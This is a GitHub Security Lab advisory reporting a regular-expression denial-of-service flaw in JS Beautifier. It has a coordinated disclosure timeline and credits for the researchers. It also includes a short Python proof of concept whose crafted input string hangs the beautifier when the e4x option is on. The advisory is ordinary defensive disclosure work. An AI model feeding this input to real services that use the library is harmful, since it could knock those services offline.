Coordinated Disclosure Timeline
- 2021-08-31: Sent report to bitwiseman@beautifier.io
- 2021-10-14: They have code scanning enabled, so this bug is listed in their code scanning results.
- 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
- 2021-11-30: Disclosure deadline expired.
- 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
- 2021-12-09: Created a new pull request to fix the bug, which was successful.
Summary
JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
JS Beautifier
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on JS Beautifier by following this link.
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install jsbeautifier:
pip3 install jsbeautifier - Run the below with
python3:
import jsbeautifier
str = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''
print(jsbeautifier.beautify(str, {'e4x': True}))
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-113 in any communication regarding this issue.